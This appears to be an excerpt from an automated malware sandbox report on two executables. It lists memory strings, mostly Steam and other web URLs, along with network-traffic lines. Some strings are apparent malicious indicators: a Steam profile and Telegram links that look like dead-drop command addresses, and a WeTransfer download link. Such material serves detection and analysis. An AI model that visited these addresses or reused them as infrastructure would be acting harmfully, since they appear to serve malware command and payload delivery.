Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=c4UneKQJ
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=2YYI
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=ZVlkBFZXqRp1&l=e
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=en
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=1_BxDGVvfXwv&am
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: UXNob1Dp32.exe, 00000005.00000003.1737013197.00000000097F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000928000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: build2.exe, 00000009.00000002.1935491088.0000000000928000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/9
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199673019888
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: build2.exe, 00000008.00000002.1752904498.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199673019888
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199673019888/badges
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199673019888/inventory/
Source: build2.exe, 00000009.00000002.1935491088.0000000000968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199673019888A
Source: build2.exe, 00000008.00000002.1752904498.00000000035A0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199673019888ve74rMozilla/5.0
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: build2.exe, 00000008.00000002.1752904498.00000000035A0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://t.me/irfail
Source: build2.exe, 00000008.00000002.1752904498.00000000035A0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://t.me/irfailAt
Source: UXNob1Dp32.exe, 00000005.00000002.2201568233.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000002.2201568233.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000006.00000002.4081262958.000000000075E000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000006.00000002.4081262958.0000000000798000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000006.00000002.4081262958.0000000000755000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000006.00000002.4081262958.0000000000744000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49730 version: TLS 1.2
